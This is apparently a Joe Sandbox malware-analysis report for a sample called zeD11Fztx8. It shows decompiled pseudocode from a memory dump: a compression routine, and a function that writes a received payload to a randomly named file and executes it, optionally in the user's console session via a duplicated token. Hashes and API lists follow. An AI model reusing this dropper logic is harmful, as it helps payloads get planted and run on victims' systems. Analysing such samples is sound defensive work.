						_t502 =  <  ? _v20 : 0x102 - _t520;
						_v20 = _v20 - 0x102;
						_t503 = ( <  ? _v20 : 0x102 - _t520) +  *((intOrPtr*)(_t612 + 0x20));
						_v56 = _v12 + 0x102;
						_t567 = _v12;
						 *((intOrPtr*)(_t612 + 0x20)) = ( <  ? _v20 : 0x102 - _t520) +  *((intOrPtr*)(_t612 + 0x20));
						while(_t567 != _v56) {
							_t504 =  *_t567;
							_v12 = _t567 + 1;
							 *(_t612 + _t610 + 0x90) = _t504;
							if(_t610 < 0x101) {
								 *(_t610 + _t612 + 0x8090) = _t504;
							}
							_t582 = (_t582 << 0x00000005 ^ _t504 & 0x000000ff) & 0x00007fff;
							_t610 = _t610 + 0x00000001 & 0x00007fff;
							 *((short*)(_t612 + 0x19272 + (_t511 & 0x00007fff) * 2)) =  *(_t612 + 0x29272 + _t582 * 2);
							_t567 = _v12;
							 *(_t612 + 0x29272 + _t582 * 2) = _t511;
							_t511 = _t511 + 1;
						}
						_t601 = _v20;
					}
					L11:
					_t572 =  *((intOrPtr*)(_t612 + 0x20));
					_t522 =  <  ? 0x8000 - _t572 :  *((intOrPtr*)(_t612 + 0x24));
					_v24 = _t522;
					 *((intOrPtr*)(_t612 + 0x24)) = _t522;
					if(_v48 != 0 || _t572 >= 0x102) {
						_t380 =  *((intOrPtr*)(_t612 + 0x50));
						_t602 = 0;
						_v64 = _t380;
						_v56 = 1;
						_t508 =  !=  ? _t380 : 2;
						_v8 = 0;
						_t381 =  *(_t612 + 0x1c);
						_v28 = _t381;
						_v28 = _v28 & 0x00007fff;
						_v16 = 2;
						if(( *(_t612 + 8) & 0x00090000) == 0) {
							_t382 = _t381 & 0x00007fff;
							_t523 = _v24;
							_v32 = _t382;
							_t603 = _t382;
							_v52 = 2;
							asm("sbb eax, eax");
							_v60 =  *((intOrPtr*)(_t612 + 0x10 + _t382 * 4));
							_v72 = _t612 + 0x90;
							_v44 =  *(_t603 + 2 + _t612 + 0x8f) & 0x0000ffff;
							_v68 =  *(_t612 + _t603 + 0x90) & 0x0000ffff;
							if(_t572 > 2) {
								while(1) {
									_t125 =  &_v60;
									 *_t125 = _v60 - 1;
									if( *_t125 == 0) {
										goto L33;
									}
									_t604 =  *(_t612 + 0x19272 + _t603 * 2) & 0x0000ffff;
									if(_t604 == 0) {
										goto L33;
									} else {
										_t592 =  *(_t612 + 0x1c) - _t604 & 0x0000ffff;
										_v40 = _t592;
										if(_t592 > _t523) {
											goto L33;
										} else {
											_t603 = _t604 & 0x00007fff;
											_t548 = _v52 + _t612;
											if( *((intOrPtr*)(_t548 + _t603 + 0x8f)) == _v44) {
												L51:
												if(_t592 == 0) {
													goto L33;
												} else {
													_t523 = _v24;
													_t516 = _t612 + 0x90 + _t603;
													if( *_t516 != _v68) {
														_t508 = _v16;
														continue;
													} else {
														_t550 = _v32 + _t612 + 0x90;
														_t594 = 0x20;
														while(1) {
															_t160 = _t550 + 2; // 0x7401fe83
															_t551 = _t550 + 2;
															_t517 = _t516 + 2;
															if( *_t160 !=  *_t517) {
																break;
															}
															_t161 = _t551 + 2; // 0xfe83f08b
															_t551 = _t551 + 2;
															_t517 = _t517 + 2;
															if( *_t161 ==  *_t517) {
																_t162 = _t551 + 2; // 0xf08bffff
																_t551 = _t551 + 2;
																_t517 = _t517 + 2;
																if( *_t162 ==  *_t517) {
																	_t163 = _t551 + 2; // 0xfffffe61
																	_t551 = _t551 + 2;
																	_t517 = _t517 + 2;
																	if( *_t163 ==  *_t517) {
																		_t594 = _t594 - 1;
																		if(_t594 != 0) {
																			continue;
																		}
																	}
																}
															}
															break;
														}
														_v36 = _t551;
														_t595 = _v40;
														if(_t594 == 0) {
															_t602 = _t595;
															_t508 =  <  ?  *((void*)(_t612 + 0x20)) : 0x102;
															_v16 = 0x102;
															goto L34;
														} else {
															_t612 = _v76;
															_t508 = _v16;
															_t463 = (0 |  *_t551 ==  *_t517) + (_t551 - _v72 + _v32 >> 1) * 2;
															_t523 = _v24;
															if(_t463 <= _v52) {
																continue;
															} else {
																_v8 = _v40;
																_t555 =  *((intOrPtr*)(_t612 + 0x20));
																_t600 =  <  ? _t555 : _t463;
																_v52 = _t600;
																_t508 = _t600;
																_v16 = _t508;
																if(_t600 == _t555) {
																	goto L33;
																} else {
																	_t523 = _v24;
																	_t184 = _t612 + 0x8f; // 0x38279020
																	_v44 =  *(_v32 + _t600 + _t184) & 0x0000ffff;
																	continue;
																}
															}
														}
													}
												}
											} else {
												_t605 =  *(_t612 + 0x19272 + _t603 * 2) & 0x0000ffff;
												if(_t605 == 0) {
													goto L33;
												} else {
													_t592 =  *(_t612 + 0x1c) - _t605 & 0x0000ffff;
													_v40 = _t592;
													if(_t592 > _v24) {
														goto L33;
													} else {
														_t603 = _t605 & 0x00007fff;
														if( *((intOrPtr*)(_t548 + _t603 + 0x8f)) == _v44) {
															goto L51;
														} else {
															_t606 =  *(_t612 + 0x19272 + _t603 * 2) & 0x0000ffff;
															if(_t606 == 0) {
																goto L33;
															} else {
																_t592 =  *(_t612 + 0x1c) - _t606 & 0x0000ffff;
																_v40 = _t592;
																if(_t592 > _v24) {
																	goto L33;
																} else {
																	_t603 = _t606 & 0x00007fff;
																	_t523 = _v24;
																	if( *((intOrPtr*)(_t548 + _t603 + 0x8f)) != _v44) {
																		continue;
																	} else {
																		goto L51;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									L95:
									 *(_t612 + 0x1c) =  *(_t612 + 0x1c) + _t528;
									 *((intOrPtr*)(_t612 + 0x20)) =  *((intOrPtr*)(_t612 + 0x20)) - _t528;
									_t402 =  *((intOrPtr*)(_t612 + 0x24)) + _t528;
									_t530 =  <  ? _t402 : 0x8000;
									 *((intOrPtr*)(_t612 + 0x24)) =  <  ? _t402 : 0x8000;
									_t531 =  *(_t612 + 0x28);
									if(_t531 > _t612 + 0x1926a) {
										L99:
										_t601 = _v20;
										 *((intOrPtr*)(_t612 + 0x84)) = _v12;
										 *((intOrPtr*)(_t612 + 0x88)) = _t601;
										_t534 = E01386E70(_t612, 0);
										if(_t534 != 0) {
											return 0 | _t534 > 0x00000000;
										} else {
											_t375 = _v48;
											goto L1;
										}
									} else {
										_t585 =  *((intOrPtr*)(_t612 + 0x3c));
										_t601 = _v20;
										_t375 = _v48;
										if(_t585 <= 0x7c00) {
											L1:
											_t571 = _v12;
											goto L2;
										} else {
											if((_t531 - _t612 - 0x9272) * 0x73 >> 7 >= _t585) {
												goto L99;
											} else {
												_t375 = _v48;
												if(( *(_t612 + 8) & 0x00080000) == 0) {
													goto L1;
												} else {
													goto L99;
												}
											}
										}
									}
									goto L103;
								}
								goto L33;
							} else {
								L33:
								_t602 = _v8;
							}
							goto L34;
						} else {
							if(_t522 == 0 || ( *(_t612 + 8) & 0x00080000) != 0) {
								L34:
								if(_t508 != 3 || _t602 < 0x2000) {
									goto L36;
								} else {
									_t573 = _v28;
									_t524 =  *(_t612 + 8);
									goto L65;
								}
							} else {
								_t508 = 0;
								_v16 = 0;
								_t556 =  *((intOrPtr*)((_v28 - 0x00000001 & 0x00007fff) + _t612 + 0x90));
								if(_t572 == 0) {
									L31:
									_t508 = 0;
									_v16 = 0;
									L36:
									_t573 = _v28;
									_t524 =  *(_t612 + 8);
									if(_t573 == _t602) {
										L65:
										_t508 = 0;
										_t602 = 0;
										_v16 = 0;
									} else {
										if((_t524 & 0x00020000) != 0 && _t508 <= 5) {
											goto L65;
										}
									}
								} else {
									_t480 = _v28 + _t612;
									while( *((intOrPtr*)(_t480 + _t508 + 0x90)) == _t556) {
										_t508 = _t508 + 1;
										if(_t508 < _t572) {
											continue;
										}
										break;
									}
									_v16 = _t508;
									if(_t508 < 3) {
										goto L31;
									} else {
										_t602 = 1;
										goto L34;
									}
								}
							}
						}
						_t390 = _v64;
						if(_t390 == 0) {
							if(_t602 != 0) {
								if( *((intOrPtr*)(_t612 + 0x14)) != 0 || (_t524 & 0x00010000) != 0 || _t508 >= 0x80) {
									_t316 = _t508 - 3; // -3
									 *((intOrPtr*)(_t612 + 0x3c)) =  *((intOrPtr*)(_t612 + 0x3c)) + _t508;
									_t319 = _t602 - 1; // -1
									_t509 = _t319;
									_t575 = _t509 >> 8;
									 *( *(_t612 + 0x28)) = _t316;
									( *(_t612 + 0x28))[1] = _t509;
									( *(_t612 + 0x28))[2] = _t575;
									 *(_t612 + 0x28) =  &(( *(_t612 + 0x28))[3]);
									 *( *(_t612 + 0x2c)) =  *( *(_t612 + 0x2c)) >> 0x00000001 | 0x00000080;
									_t327 = _t612 + 0x38;
									 *_t327 =  *((intOrPtr*)(_t612 + 0x38)) - 1;
									if( *_t327 == 0) {
										_t411 =  *(_t612 + 0x28);
										 *(_t612 + 0x2c) = _t411;
										 *((intOrPtr*)(_t612 + 0x38)) = 8;
										 *(_t612 + 0x28) =  &(_t411[0]);
									}
									_t576 = _t575 & 0x0000007f;
									_t333 = (_t509 & 0x000001ff) + 0x138b220; // 0x201001d
									_t334 = _t576 + 0x138b1a0; // 0x12000000
									_t400 =  <  ?  *_t333 & 0x000000ff :  *_t334 & 0x000000ff;
									_t528 = _v16;
									 *((short*)(_t612 + 0x83d2 + ( <  ?  *_t333 & 0x000000ff :  *_t334 & 0x000000ff) * 2)) =  *((short*)(_t612 + 0x83d2 + ( <  ?  *_t333 & 0x000000ff :  *_t334 & 0x000000ff) * 2)) + 1;
									if(_t528 >= 3) {
										_t410 =  *(0x138b41a + _t528 * 2) & 0x0000ffff;
										goto L94;
									}
								} else {
									_t528 = _v56;
									_t414 =  <  ? _t573 : 0x8100;
									 *(_t612 + 0x54) =  *(( <  ? _t573 : 0x8100) + _t612 + 0x90) & 0x000000ff;
									 *((intOrPtr*)(_t612 + 0x4c)) = _t602;
									 *((intOrPtr*)(_t612 + 0x50)) = _t508;
								}
							} else {
								_t417 =  <  ? _t573 : 0x8100;
								_t538 =  *(( <  ? _t573 : 0x8100) + _t612 + 0x90);
								 *((intOrPtr*)(_t612 + 0x3c)) =  *((intOrPtr*)(_t612 + 0x3c)) + 1;
								 *( *(_t612 + 0x28)) = _t538;
								 *(_t612 + 0x28) =  &(( *(_t612 + 0x28))[1]);
								 *( *(_t612 + 0x2c)) =  *( *(_t612 + 0x2c)) >> 1;
								_t299 = _t612 + 0x38;
								 *_t299 =  *((intOrPtr*)(_t612 + 0x38)) - 1;
								if( *_t299 == 0) {
									_t420 =  *(_t612 + 0x28);
									 *(_t612 + 0x2c) = _t420;
									 *((intOrPtr*)(_t612 + 0x38)) = 8;
									 *(_t612 + 0x28) =  &(_t420[0]);
								}
								_t410 = _t538 & 0x000000ff;
								_t528 = _v56;
								L94:
								 *((short*)(_t612 + 0x8192 + _t410 * 2)) =  *((short*)(_t612 + 0x8192 + _t410 * 2)) + 1;
							}
						} else {
							if(_t508 <= _t390) {
								 *((intOrPtr*)(_t612 + 0x3c)) =  *((intOrPtr*)(_t612 + 0x3c)) + _t390;
								_t513 =  *((intOrPtr*)(_t612 + 0x4c)) - 1;
								 *( *(_t612 + 0x28)) = _t390 - 3;
								_t587 = _t513 >> 8;
								( *(_t612 + 0x28))[1] = _t513;
								( *(_t612 + 0x28))[2] = _t587;
								 *(_t612 + 0x28) =  &(( *(_t612 + 0x28))[3]);
								 *( *(_t612 + 0x2c)) =  *( *(_t612 + 0x2c)) >> 0x00000001 | 0x00000080;
								_t266 = _t612 + 0x38;
								 *_t266 =  *((intOrPtr*)(_t612 + 0x38)) - 1;
								if( *_t266 == 0) {
									_t434 =  *(_t612 + 0x28);
									 *(_t612 + 0x2c) = _t434;
									 *((intOrPtr*)(_t612 + 0x38)) = 8;
									 *(_t612 + 0x28) =  &(_t434[0]);
								}
								_t431 =  <  ?  *((_t513 & 0x000001ff) + 0x138b220) & 0x000000ff :  *((_t587 & 0x0000007f) + 0x138b1a0) & 0x000000ff;
								 *((short*)(_t612 + 0x83d2 + ( <  ?  *((_t513 & 0x000001ff) + 0x138b220) & 0x000000ff :  *((_t587 & 0x0000007f) + 0x138b1a0) & 0x000000ff) * 2)) =  *((short*)(_t612 + 0x83d2 + ( <  ?  *((_t513 & 0x000001ff) + 0x138b220) & 0x000000ff :  *((_t587 & 0x0000007f) + 0x138b1a0) & 0x000000ff) * 2)) + 1;
								_t432 = _v64;
								if(_t432 >= 3) {
									 *((short*)(_t612 + 0x8192 + ( *(0x138b41a + _t432 * 2) & 0x0000ffff) * 2)) =  *((short*)(_t612 + 0x8192 + ( *(0x138b41a + _t432 * 2) & 0x0000ffff) * 2)) + 1;
								}
								_t528 =  *((intOrPtr*)(_t612 + 0x50)) - 1;
								 *((intOrPtr*)(_t612 + 0x50)) = 0;
							} else {
								_t543 =  *(_t612 + 0x54);
								 *((intOrPtr*)(_t612 + 0x3c)) =  *((intOrPtr*)(_t612 + 0x3c)) + 1;
								 *( *(_t612 + 0x28)) = _t543;
								 *(_t612 + 0x28) =  &(( *(_t612 + 0x28))[1]);
								 *( *(_t612 + 0x2c)) =  *( *(_t612 + 0x2c)) >> 1;
								_t200 = _t612 + 0x38;
								 *_t200 =  *((intOrPtr*)(_t612 + 0x38)) - 1;
								if( *_t200 == 0) {
									_t453 =  *(_t612 + 0x28);
									 *(_t612 + 0x2c) = _t453;
									 *((intOrPtr*)(_t612 + 0x38)) = 8;
									 *(_t612 + 0x28) =  &(_t453[0]);
								}
								 *((short*)(_t612 + 0x8192 + (_t543 & 0x000000ff) * 2)) =  *((short*)(_t612 + 0x8192 + (_t543 & 0x000000ff) * 2)) + 1;
								if(_t508 < 0x80) {
									_t528 = _v56;
									 *(_t612 + 0x54) =  *(_t573 + _t612 + 0x90) & 0x000000ff;
									 *((intOrPtr*)(_t612 + 0x4c)) = _t602;
									 *((intOrPtr*)(_t612 + 0x50)) = _t508;
								} else {
									_t213 = _t508 - 3; // -3
									 *((intOrPtr*)(_t612 + 0x3c)) =  *((intOrPtr*)(_t612 + 0x3c)) + _t508;
									_t216 = _t602 - 1; // -1
									_t514 = _t216;
									_t590 = _t514 >> 8;
									 *( *(_t612 + 0x28)) = _t213;
									( *(_t612 + 0x28))[1] = _t514;
									( *(_t612 + 0x28))[2] = _t590;
									 *(_t612 + 0x28) =  &(( *(_t612 + 0x28))[3]);
									 *( *(_t612 + 0x2c)) =  *( *(_t612 + 0x2c)) >> 0x00000001 | 0x00000080;
									_t224 = _t612 + 0x38;
									 *_t224 =  *((intOrPtr*)(_t612 + 0x38)) - 1;
									if( *_t224 == 0) {
										_t451 =  *(_t612 + 0x28);
										 *(_t612 + 0x2c) = _t451;
										 *((intOrPtr*)(_t612 + 0x38)) = 8;
										 *(_t612 + 0x28) =  &(_t451[0]);
									}
									_t591 = _t590 & 0x0000007f;
									_t230 = (_t514 & 0x000001ff) + 0x138b220; // 0x201001d
									_t231 = _t591 + 0x138b1a0; // 0x12000000
									_t449 =  <  ?  *_t230 & 0x000000ff :  *_t231 & 0x000000ff;
									_t528 = _v16;
									 *((short*)(_t612 + 0x83d2 + ( <  ?  *_t230 & 0x000000ff :  *_t231 & 0x000000ff) * 2)) =  *((short*)(_t612 + 0x83d2 + ( <  ?  *_t230 & 0x000000ff :  *_t231 & 0x000000ff) * 2)) + 1;
									if(_t528 >= 3) {
										 *((short*)(_t612 + 0x8192 + ( *(0x138b41a + _t528 * 2) & 0x0000ffff) * 2)) =  *((short*)(_t612 + 0x8192 + ( *(0x138b41a + _t528 * 2) & 0x0000ffff) * 2)) + 1;
									}
									 *((intOrPtr*)(_t612 + 0x50)) = 0;
								}
							}
						}
						goto L95;
					} else {
						break;
					}
					L103:
				}
				 *((intOrPtr*)(_t612 + 0x88)) = _t601;
				 *((intOrPtr*)(_t612 + 0x84)) = _v12;
				return 1;
				goto L103;
			}

0x013877f8
0x013877fb
0x013877fe
0x01387804
0x0138780a
0x01387810
0x01387813
0x01387816
0x00000000
0x01387820
0x01387838
0x01387840
0x013879c6
0x013879d0
0x013879d0
0x013879d9
0x00000000
0x00000000
0x013879e2
0x013879e3
0x013879e7
0x013879ec
0x013879ef
0x013879f0
0x013879f3
0x013879ff
0x01387a01
0x01387a01
0x01387a08
0x01387a0e
0x01387a16
0x01387a1e
0x01387a25
0x01387a38
0x01387a56
0x01387a60
0x01387a68
0x01387a6b
0x01387a73
0x01387a73
0x01387a78
0x00000000
0x00000000
0x01387a7e
0x00000000
0x01387a78
0x013879d0
0x01387846
0x01387849
0x0138784d
0x01387853
0x01387853
0x01387865
0x01387878
0x01387887
0x0138788b
0x01387890
0x01387893
0x01387896
0x01387899
0x0138789f
0x013878a1
0x013878a4
0x013878a7
0x013878b4
0x013878b6
0x013878b6
0x013878ce
0x013878d4
0x013878e2
0x013878ea
0x013878ed
0x013878f5
0x013878f6
0x013878fb
0x013878fb
0x013878fe
0x013878fe
0x0138790d
0x01387914
0x01387917
0x0138791a
0x01387928
0x0138792b
0x0138792f
0x01387937
0x0138793e
0x01387941
0x01387944
0x01387947
0x0138794a
0x01387958
0x0138795b
0x01387a8a
0x01387a8f
0x01387a92
0x01387a95
0x01387a9a
0x01387a9d
0x01387aa3
0x01387aac
0x01387abb
0x01387ac8
0x01387acd
0x01387b13
0x01387b13
0x01387b13
0x01387b16
0x00000000
0x00000000
0x01387b18
0x01387b22
0x00000000
0x01387b24
0x01387b29
0x01387b2c
0x01387b31
0x00000000
0x01387b33
0x01387b36
0x01387b3f
0x01387b49
0x01387bc0
0x01387bc2
0x00000000
0x01387bc8
0x01387bd1
0x01387bd4
0x01387bd9
0x01387b10
0x00000000
0x01387bdf
0x01387be8
0x01387bea
0x01387bf0
0x01387bf0
0x01387bf4
0x01387bf7
0x01387bfd
0x00000000
0x00000000
0x01387bff
0x01387c03
0x01387c06
0x01387c0c
0x01387c0e
0x01387c12
0x01387c15
0x01387c1b
0x01387c1d
0x01387c21
0x01387c24
0x01387c2a
0x01387c2c
0x01387c2d
0x00000000
0x00000000
0x01387c2d
0x01387c2a
0x01387c1b
0x00000000
0x01387c0c
0x01387c31
0x01387c34
0x01387c37
0x01387ca0
0x01387ca5
0x01387ca9
0x00000000
0x01387c39
0x01387c41
0x01387c4e
0x01387c54
0x01387c57
0x01387c5d
0x00000000
0x01387c63
0x01387c68
0x01387c6b
0x01387c70
0x01387c73
0x01387c76
0x01387c78
0x01387c7d
0x00000000
0x01387c83
0x01387c86
0x01387c8b
0x01387c93
0x00000000
0x01387c93
0x01387c7d
0x01387c5d
0x01387c37
0x01387bd9
0x01387b4b
0x01387b4b
0x01387b55
0x00000000
0x01387b5b
0x01387b60
0x01387b63
0x01387b69
0x00000000
0x01387b6f
0x01387b72
0x01387b80
0x00000000
0x01387b82
0x01387b82
0x01387b8c
0x00000000
0x01387b92
0x01387b97
0x01387b9a
0x01387ba0
0x00000000
0x01387ba6
0x01387ba9
0x01387bb7
0x01387bba
0x00000000
0x00000000
0x00000000
0x00000000
0x01387bba
0x01387ba0
0x01387b8c
0x01387b80
0x01387b69
0x01387b55
0x01387b49
0x01387b31
0x01387f55
0x01387f55
0x01387f58
0x01387f5e
0x01387f67
0x01387f70
0x01387f73
0x01387f78
0x01387fb1
0x01387fb6
0x01387fb9
0x01387fc1
0x01387fcc
0x01387fd0
0x01388002
0x01387fd2
0x01387fd2
0x00000000
0x01387fd2
0x01387f7a
0x01387f7a
0x01387f7d
0x01387f80
0x01387f89
0x0138781b
0x0138781b
0x00000000
0x01387f8f
0x01387f9f
0x00000000
0x01387fa1
0x01387fa8
0x01387fab
0x00000000
0x00000000
0x00000000
0x00000000
0x01387fab
0x01387f9f
0x01387f89
0x00000000
0x01387f78
0x00000000
0x01387acf
0x01387acf
0x01387acf
0x01387acf
0x00000000
0x01387961
0x01387963
0x01387ad2
0x01387ad5
0x00000000
0x01387cb1
0x01387cb1
0x01387cb4
0x00000000
0x01387cb4
0x01387976
0x01387979
0x0138797c
0x01387984
0x0138798d
0x01387a83
0x01387a83
0x01387a85
0x01387ae3
0x01387ae3
0x01387ae6
0x01387aeb
0x01387cb7
0x01387cb7
0x01387cb9
0x01387cbb
0x01387af1
0x01387af7
0x00000000
0x01387b06
0x01387af7
0x01387993
0x01387996
0x013879a0
0x013879a9
0x013879ac
0x00000000
0x00000000
0x00000000
0x013879ac
0x013879ae
0x013879b4
0x00000000
0x013879ba
0x013879ba
0x00000000
0x013879ba
0x013879b4
0x0138798d
0x01387963
0x01387cbe
0x01387cc3
0x01387e53
0x01387e9b
0x01387ed3
0x01387ed6
0x01387ed9
0x01387ed9
0x01387ede
0x01387ee1
0x01387ee6
0x01387eec
0x01387ef2
0x01387efc
0x01387efe
0x01387efe
0x01387f01
0x01387f03
0x01387f06
0x01387f0a
0x01387f11
0x01387f11
0x01387f16
0x01387f24
0x01387f2b
0x01387f32
0x01387f35
0x01387f38
0x01387f43
0x01387f45
0x00000000
0x01387f45
0x01387ead
0x01387ead
0x01387eb7
0x01387ec2
0x01387ec5
0x01387ec8
0x01387ec8
0x01387e55
0x01387e5c
0x01387e5f
0x01387e69
0x01387e6c
0x01387e71
0x01387e74
0x01387e76
0x01387e76
0x01387e79
0x01387e7b
0x01387e7e
0x01387e82
0x01387e89
0x01387e89
0x01387e8c
0x01387e8f
0x01387f4d
0x01387f4d
0x01387f4d
0x01387cc9
0x01387ccb
0x01387dbb
0x01387dc7
0x01387dca
0x01387dcf
0x01387dd2
0x01387dd8
0x01387dde
0x01387de8
0x01387dea
0x01387dea
0x01387ded
0x01387def
0x01387df2
0x01387df6
0x01387dfd
0x01387dfd
0x01387e1e
0x01387e21
0x01387e29
0x01387e2f
0x01387e39
0x01387e39
0x01387e44
0x01387e45
0x01387cd1
0x01387cd4
0x01387cd7
0x01387cda
0x01387cdf
0x01387ce2
0x01387ce4
0x01387ce4
0x01387ce7
0x01387ce9
0x01387cec
0x01387cf0
0x01387cf7
0x01387cf7
0x01387cfd
0x01387d0b
0x01387daa
0x01387dad
0x01387db0
0x01387db3
0x01387d11
0x01387d14
0x01387d17
0x01387d1a
0x01387d1a
0x01387d1f
0x01387d22
0x01387d27
0x01387d2d
0x01387d33
0x01387d3d
0x01387d3f
0x01387d3f
0x01387d42
0x01387d44
0x01387d47
0x01387d4b
0x01387d52
0x01387d52
0x01387d57
0x01387d65
0x01387d6c
0x01387d73
0x01387d76
0x01387d79
0x01387d84
0x01387d8e
0x01387d8e
0x01387d96
0x01387d96
0x01387d0b
0x01387ccb
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0138791a
0x01387fe2
0x01387fe9
0x01387ff4
0x00000000

Memory Dump Source

Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true

Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfbbaaa891196b7f8b72461f3ec11663558a2f562eb06fbfcb3ac14816be1d4f
Instruction ID: a104d50140baec46dafd7ff9913680797f1b094292e6cd300f04c892df4ee028
Opcode Fuzzy Hash: bfbbaaa891196b7f8b72461f3ec11663558a2f562eb06fbfcb3ac14816be1d4f
Instruction Fuzzy Hash: C642BC35A00B458FCB25DF69C4906AAFBF2FF88308F28896DD49A97751DB34E945CB10

Uniqueness

Uniqueness Score: -1.00%

Function 01381BE0, Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true

Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33c5dfdfbcfe9feac0c960751525ee3cd10a70b8a830c79ced4a8ef27683a6d5
Instruction ID: 491aa0fd6dd221122df0e1e997ed0c94496d237fc211aa5bc634fcb29047e480
Opcode Fuzzy Hash: 33c5dfdfbcfe9feac0c960751525ee3cd10a70b8a830c79ced4a8ef27683a6d5
Instruction Fuzzy Hash: 5601F7336002199FCF20DF4ED5C06B9F3F5FBC4269B9940AAE94887200E731A992C790

Uniqueness

Uniqueness Score: -1.00%

Function 0138A3A0, Relevance: 49.2, APIs: 27, Strings: 1, Instructions: 225
memoryfileprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 63%

			E0138A3A0(long _a4) {
				void* _v8;
				long _v12;
				struct _PROCESS_INFORMATION _v28;
				struct _STARTUPINFOW _v96;
				char _v156;
				char _v284;
				short _v804;
				char _v1324;
				void* _t58;
				signed int _t62;
				WCHAR* _t68;
				long _t89;
				signed int _t93;
				WCHAR* _t99;
				void* _t122;
				void* _t123;
				void* _t136;
				void* _t139;
				void* _t140;
				void* _t143;
				void* _t144;
				void* _t145;
				void* _t146;

				_t136 = _a4;
				_t58 =  *((intOrPtr*)(_t136 + 4)) - 1;
				if(_t58 == 0) {
					_t122 =  *(_t136 + 8);
					_a4 =  *((intOrPtr*)(_t136 + 0xc));
					 *0x138c214(0, 0x23, 0, 0,  &_v804);
					_t62 = GetTickCount();
					_t39 = (_t62 & 0x0000000f) + 4; // 0x4
					E01382240( &_v284, _t39);
					 *((short*)(_t146 + (_t62 & 0x0000000f) * 2 - 0x110)) = 0;
					E01381830(0x13815a4, 0xc, 0x435ca571,  &_v12);
					_t139 = _v12;
					_t68 =  &_v804;
					 *0x138c200(_t68, 0x104, _t139, _t68,  &_v284);
					HeapFree(GetProcessHeap(), 0, _t139);
					_t140 = CreateFileW( &_v804, 0x40000000, 0, 0, 2, 0x80, 0);
					if(_t140 == 0xffffffff) {
						L13:
						HeapFree(GetProcessHeap(), 0, _t136);
						return 0;
					}
					WriteFile(_t140, _t122, _a4,  &_a4, 0);
					CloseHandle(_t140);
					memset( &_v96, 0, 0x44);
					_v96.cb = 0x44;
					if(CreateProcessW( &_v804, 0, 0, 0, 0, 0, 0, 0,  &_v96,  &_v28) == 0) {
						goto L13;
					}
					CloseHandle(_v28.hProcess);
					_push(_v28.hThread);
					L12:
					CloseHandle();
					goto L13;
				}
				if(_t58 != 1) {
					goto L13;
				}
				_t89 =  *((intOrPtr*)(_t136 + 0xc));
				_t123 =  *(_t136 + 8);
				_v12 = _t89;
				_a4 = 0;
				__imp__WTSGetActiveConsoleSessionId();
				if(_t89 == 0xffffffff) {
					goto L13;
				}
				_push( &_v8);
				_push(_t89);
				if( *0x138c224() != 0) {
					 *0x138c074(_v8, 0x2000000, 0, 1, 1,  &_a4);
					CloseHandle(_v8);
				}
				 *0x138c214(0, 0x23, 0, 0,  &_v804);
				_t93 = GetTickCount();
				_t13 = (_t93 & 0x0000000f) + 4; // 0x4
				E01382240( &_v156, _t13);
				 *((short*)(_t146 + (_t93 & 0x0000000f) * 2 - 0x90)) = 0;
				E01381830(0x13815a4, 0xc, 0x435ca571,  &_v8);
				_t143 = _v8;
				_t99 =  &_v804;
				 *0x138c200(_t99, 0x104, _t143, _t99,  &_v156);
				HeapFree(GetProcessHeap(), 0, _t143);
				_t144 = CreateFileW( &_v804, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t144 != 0xffffffff) {
					WriteFile(_t144, _t123, _v12,  &_v12, 0);
					CloseHandle(_t144);
					E01381830(0x1381398, 4, 0x435ca571,  &_v8);
					_t145 = _v8;
					 *0x138c200( &_v1324, 0x104, _t145,  &_v804);
					HeapFree(GetProcessHeap(), 0, _t145);
					if(E01382180( &_v1324, _a4,  &_v28) != 0) {
						CloseHandle(_v28);
						CloseHandle(_v28.hThread);
					}
				}
				_push(_a4);
				goto L12;
			}

0x0138a3ac
0x0138a3b2
0x0138a3b3
0x0138a550
0x0138a553
0x0138a565
0x0138a56b
0x0138a57c
0x0138a57f
0x0138a58b
0x0138a5a1
0x0138a5a6
0x0138a5b0
0x0138a5be
0x0138a5d1
0x0138a5f6
0x0138a5fb
0x0138a666
0x0138a670
0x0138a67e
0x0138a67e
0x0138a608
0x0138a60f
0x0138a61d
0x0138a626
0x0138a652
0x00000000
0x00000000
0x0138a657
0x0138a65d
0x0138a660
0x0138a660
0x00000000
0x0138a660
0x0138a3ba
0x00000000
0x00000000
0x0138a3c0
0x0138a3c3
0x0138a3c6
0x0138a3c9
0x0138a3d0
0x0138a3d9
0x00000000
0x00000000
0x0138a3e2
0x0138a3e3
0x0138a3ec
0x0138a400
0x0138a409
0x0138a409
0x0138a41e
0x0138a424
0x0138a435
0x0138a438
0x0138a444
0x0138a45a
0x0138a45f
0x0138a469
0x0138a477
0x0138a48a
0x0138a4af
0x0138a4b4
0x0138a4c5
0x0138a4cc
0x0138a4e5
0x0138a4ea
0x0138a501
0x0138a514
0x0138a531
0x0138a536
0x0138a53f
0x0138a53f
0x0138a531
0x0138a545
0x00000000

APIs

WTSGetActiveConsoleSessionId.KERNEL32 ref: 0138A3D0
CloseHandle.KERNEL32(?), ref: 0138A409
GetTickCount.KERNEL32 ref: 0138A424
_snwprintf.NTDLL ref: 0138A477
GetProcessHeap.KERNEL32(00000000,?), ref: 0138A483
HeapFree.KERNEL32(00000000), ref: 0138A48A
